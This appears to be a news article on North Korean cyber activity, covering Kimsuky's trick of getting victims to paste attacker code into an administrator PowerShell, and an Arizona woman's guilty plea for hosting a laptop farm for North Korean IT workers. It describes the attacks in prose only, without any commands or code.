A North Korea-linked threat actor known as Kimsuky has been seen employing a new tactic that tricks targets into running PowerShell as an administrator and then instructs them to paste and execute malicious code provided by the attacker.
According to the Microsoft Threat Intelligence team, the threat actor poses as a South Korean government official, gradually building a relationship with the target before sending a spear-phishing email that includes a PDF attachment.
To view the supposed PDF document, victims are encouraged to click a URL that outlines steps to register their Windows system. This registration link prompts them to open PowerShell as an administrator and copy/paste the code snippet shown into the terminal for execution.
If the victim complies, the malicious code downloads and installs a browser-based remote desktop tool, along with a certificate file containing a hardcoded PIN from a remote server.
Microsoft explained that the code then sends a web request to a remote server to register the victim’s device using the downloaded certificate and PIN, enabling the threat actor to access the device and perform data exfiltration.
The tech giant noted that it has observed this tactic in limited attacks since January 2025, marking a shift from the threat actor’s typical methods. I
t’s important to mention that Kimsuky is not the only North Korean hacking group to use this compromise strategy. In December 2024, it was reported that threat actors associated with the Contagious Interview campaign are deceiving users into copying and executing a malicious command on their Apple macOS systems through the Terminal app, claiming it resolves an issue with accessing the camera and microphone via the web browser.
Recent months have seen a significant rise in attacks that utilize the ClickFix method, largely because these tactics depend on the targets unwittingly infecting their own devices, which helps them evade security measures.
An Arizona woman has pleaded guilty to operating a laptop farm for North Korean IT workers.
This development follows the U.S. Department of Justice (DoJ) announcing that a 48-year-old woman from Arizona admitted her involvement in a fraudulent scheme that enabled North Korean cybercriminals to secure remote positions at over 300 U.S. companies by impersonating American citizens and residents.
According to the department, this operation generated more than $17.1 million in illegal profits for Christina Marie Chapman and North Korea, violating international sanctions from October 2020 to October 2023.
The DoJ stated, “Chapman, an American citizen, collaborated with foreign IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals. She used these identities to apply for remote IT jobs and, to further the scheme, submitted false documents to the Department of Homeland Security.”
“Chapman and her co-conspirators secured positions at numerous U.S. companies, including Fortune 500 firms, often through temporary staffing agencies or other contracting firms.”
The defendant, arrested in May 2024, is accused of operating a laptop farm by hosting several laptops at her home to create the illusion that North Korean workers were physically present in the U.S. In reality, these workers were located in China and Russia, connecting remotely to the companies’ internal systems.
According to the Department of Justice, “Due to the actions of Chapman and her co-conspirators, over 300 U.S. companies were affected, more than 70 identities of U.S. persons were compromised, false information was provided to DHS on over 100 occasions, and more than 70 U.S. individuals had fraudulent tax liabilities created in their names.”
The heightened scrutiny from law enforcement has intensified the IT worker scheme, with reports surfacing about data theft and extortion.
The U.S. Federal Bureau of Investigation (FBI) noted in an advisory last month, “After being detected on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies comply with ransom demands. In some cases, these workers have publicly released proprietary code belonging to victim companies.”